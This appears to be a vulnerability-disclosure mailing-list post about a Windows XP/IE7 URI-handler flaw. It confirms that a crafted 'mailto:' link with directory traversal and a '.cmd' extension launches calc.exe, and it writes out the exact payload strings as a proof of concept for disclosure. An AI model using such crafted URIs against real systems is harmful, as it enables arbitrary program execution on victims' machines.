Dear All, mailto:test%../../../../windows/system32/calc.exe".cmd I would deem 1 and 3 as resonable (intented) behaviour. >2) now do the very same thing on a system with Windows XP and IE7. >calc.exe is executed. Confirmed here, that's definately a Problem, and should be linked to the Windows URI Handler. (IMHO) The behaviour is this : The extension determines the handler to use to shell "../../../../windows/system32/calc.exe" Example : mailto:test%../../../../windows/system32/calc.exe".cmd Usese the cmd handler to open calc (which executes) mailto:test%../../../../windows/system32/calc.exe".txt uses notepad and tries to open calc. Somethings definately broken with the URI handler (imho) -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
